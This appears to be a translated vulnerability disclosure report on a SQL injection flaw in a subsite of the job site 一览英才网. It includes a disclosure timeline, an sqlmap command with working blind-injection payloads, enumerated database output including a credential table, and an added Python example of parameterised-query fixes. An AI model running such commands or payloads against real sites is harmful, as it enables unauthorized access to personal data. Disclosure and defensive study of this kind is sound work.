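2015-10-29: Details reported to the vendor; awaiting vendor response
2015-11-02: Vendor confirmed; details disclosed to the vendor only
2015-11-12: Details disclosed to core white hats and experts in related fields
2015-11-22: Details disclosed to regular white hats
2015-12-02: Details disclosed to trainee white hats
2015-12-17: Details disclosed to the public
SQL injection vulnerability in a subsite of 一览英才网 (Yilan Yingcai) leaks a large amount of information
1. Testing for the SQL injection vulnerability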
sqlmap.py -u "http://**.**.**.**/zhuanti/zhuanchang/index.php?zid=3981359526867737" --dbs --level 3 --risk 3 --random-agent --current-user --users --is-dba --password --threads=10
Parameter: zid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: zid=3981359526867737 AND 3154=3154

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: zid=3981359526867737 AND (SELECT * FROM (SELECT(SLEEP(5)))iStq)
---
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
current user: 'readJob1001only@**.**.**.**%'
current user is DBA: False
database management system users [1]:
[*] 'readJob1001only'@'**.**.**.**%'
available databases [3]:
[*] information_schema
[*] job1001
[*] test
Database: job1001
[370 tables]
Database: job1001
Table: Person_DelBk
[11 entries]
| uname | pwd | password | certId | email |
There are too many tables, so I won't dump them one by one.
Filtering
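As an added example (not part of the original report and not the vendor's code), the following shows what the suggested filtering amounts to for a numeric parameter such as zid: allow-list validation combined with a bound query parameter, set beside the concatenated query that makes the boolean-based payload above work. It assumes SQLite in place of the site's MySQL, and the table name, column names and function names are hypothetical.

```python
import re
import sqlite3

ZID_RE = re.compile(r"[0-9]{1,18}")  # ASCII digits only, fits a signed 64-bit integer


def make_db():
    # Constructed stand-in data; the table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE zhuanchang (zid INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO zhuanchang VALUES (3981359526867737, 'demo page')")
    return db


def lookup_vulnerable(db, zid):
    # "Before" pattern: the raw GET value is concatenated into the statement,
    # so everything after the number is parsed as SQL.
    return db.execute("SELECT title FROM zhuanchang WHERE zid = " + zid).fetchall()


def lookup_bound(db, zid):
    # Bound parameter: the value is passed separately and never parsed as SQL.
    return db.execute("SELECT title FROM zhuanchang WHERE zid = ?", (zid,)).fetchall()


def lookup_hardened(db, zid):
    # Allow-list validation first, then a bound parameter as the real defence.
    if not ZID_RE.fullmatch(zid):
        raise ValueError("zid must be a decimal number")
    return lookup_bound(db, int(zid))


if __name__ == "__main__":
    db = make_db()
    payload = "3981359526867737 AND 3154=3154"  # boolean-based payload from the report
    print(lookup_vulnerable(db, payload))        # condition evaluated by the database
    print(lookup_bound(db, payload))             # treated as one non-matching value
    print(lookup_hardened(db, "3981359526867737"))
```

With the concatenated query, the page content changes with the truth of the appended condition, which is the signal a boolean-based blind test relies on; with validation and binding the same input is rejected or matches nothing.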
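Severity: Medium
Vulnerability Rank: 9
Confirmed: 2015-11-02 19:29
CNVD confirmed and reproduced the reported issue and has notified the site operator by email through its public contact channel; the operator will provide a fix subsequently.
None yet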